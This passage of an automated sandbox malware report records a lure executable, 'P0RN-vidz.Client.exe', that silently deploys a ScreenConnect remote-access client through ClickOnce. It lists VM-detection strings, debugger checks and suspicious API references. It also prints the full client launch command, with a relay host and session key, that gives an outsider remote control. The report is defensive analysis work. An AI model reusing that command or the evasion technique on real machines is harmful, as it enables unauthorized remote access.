                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF789F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTcpV6VMWare
                  Source: dfsvc.exe, 00000001.00000002.3015186666.0000020C3F1D3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018182042.0000020C40CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3282701373.0000018F2A658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278676068.000001CCF78D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: svchost.exe, 00000006.00000002.3279787598.0000018F2502B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00371920
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_003737C7 mov eax, dword ptr fs:[00000030h]0_2_003737C7
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_003769E3 GetProcessHeap,0_2_003769E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00371493
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00371920
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371AAD SetUnhandledExceptionFilter,0_2_00371AAD
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_003746C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003746C3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\z21e79p7.axj\o772b6nd.yza\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\screenconnect.clientservice.exe" "?e=support&y=guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=bgiaaackaabsu0exaagaaaeaaqdvp1a20vkqeqe1kqfemomlm8erwhlpjp1kqnvfaxxxr%2faz3hz0vykequlpcwre9iww0drubicd4qvtjxbscjc8nemvmhnm4mpjy73l4ngpv97oo264zqqyspkhxqngr2isoy6rpzvlkpopo9fwoecugy8yjbqwr0hdb%2bv%2bdadddeuklr%2f%2bimja6ejfzoh3jsthaeua7aipoz4is8gghx8wrkm81nniwscf%2b7mb7kkidrjbyiihgkgcgnwscjjlvcupmrfoab8thk%2flijfcp2pmajw8v7wwuops029lzkg3850zwzwc0so4vlp6yza1qfvzk7jr%2fnahgqnkfengmam3&r=&i=ustest%20191224%20140" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\z21e79p7.axj\o772b6nd.yza\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\screenconnect.clientservice.exe" "?e=support&y=guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=bgiaaackaabsu0exaagaaaeaaqdvp1a20vkqeqe1kqfemomlm8erwhlpjp1kqnvfaxxxr%2faz3hz0vykequlpcwre9iww0drubicd4qvtjxbscjc8nemvmhnm4mpjy73l4ngpv97oo264zqqyspkhxqngr2isoy6rpzvlkpopo9fwoecugy8yjbqwr0hdb%2bv%2bdadddeuklr%2f%2bimja6ejfzoh3jsthaeua7aipoz4is8gghx8wrkm81nniwscf%2b7mb7kkidrjbyiihgkgcgnwscjjlvcupmrfoab8thk%2flijfcp2pmajw8v7wwuops029lzkg3850zwzwc0so4vlp6yza1qfvzk7jr%2fnahgqnkfengmam3&r=&i=ustest%20191224%20140" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\z21e79p7.axj\o772b6nd.yza\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\screenconnect.clientservice.exe" "?e=support&y=guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=bgiaaackaabsu0exaagaaaeaaqdvp1a20vkqeqe1kqfemomlm8erwhlpjp1kqnvfaxxxr%2faz3hz0vykequlpcwre9iww0drubicd4qvtjxbscjc8nemvmhnm4mpjy73l4ngpv97oo264zqqyspkhxqngr2isoy6rpzvlkpopo9fwoecugy8yjbqwr0hdb%2bv%2bdadddeuklr%2f%2bimja6ejfzoh3jsthaeua7aipoz4is8gghx8wrkm81nniwscf%2b7mb7kkidrjbyiihgkgcgnwscjjlvcupmrfoab8thk%2flijfcp2pmajw8v7wwuops029lzkg3850zwzwc0so4vlp6yza1qfvzk7jr%2fnahgqnkfengmam3&r=&i=ustest%20191224%20140" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
